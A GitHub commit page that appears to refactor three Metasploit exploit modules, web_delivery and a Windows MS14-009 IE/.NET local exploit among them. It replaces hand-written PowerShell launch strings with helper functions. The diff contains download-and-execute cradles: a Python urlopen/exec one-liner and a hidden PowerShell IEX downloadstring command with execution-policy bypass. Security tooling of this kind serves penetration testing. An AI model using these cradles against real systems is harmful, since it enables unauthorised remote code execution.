Skip to content

Commit

Permalink
Update newer modules
Browse files Browse the repository at this point in the history
  • Loading branch information
Meatballs1 committed Jul 20, 2014
1 parent 5f05336 commit b0a596b
Show file tree
Hide file tree
Showing 3 changed files with 21 additions and 3 deletions.
6 changes: 5 additions & 1 deletion modules/exploits/multi/script/web_delivery.rb
Original file line number Diff line number Diff line change
Expand Up @@ -87,7 +87,11 @@ def primer
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
when "PSH_x86", "PSH_x64"
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
print_line generate_psh_command_line({
:noprofile => true,
:windowstyle => 'hidden',
:command => download_and_run
})
end
end
end
Original file line number Diff line number Diff line change
Expand Up @@ -79,7 +79,14 @@ def exploit
end

def primer
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
cmd = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
{
:remove_comspec => true
}
)

cmd.gsub!('powershell.exe ','')
session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)

html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"
Expand Down
9 changes: 8 additions & 1 deletion modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
Original file line number Diff line number Diff line change
Expand Up @@ -148,7 +148,14 @@ def exploit

print_good(".NET looks vulnerable, exploiting...")

cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
cmd = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
{
:remove_comspec => true
}
)

cmd.gsub!('powershell.exe ','')
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)

temp = get_env('TEMP')
Expand Down

0 comments on commit b0a596b

Please sign in to comment.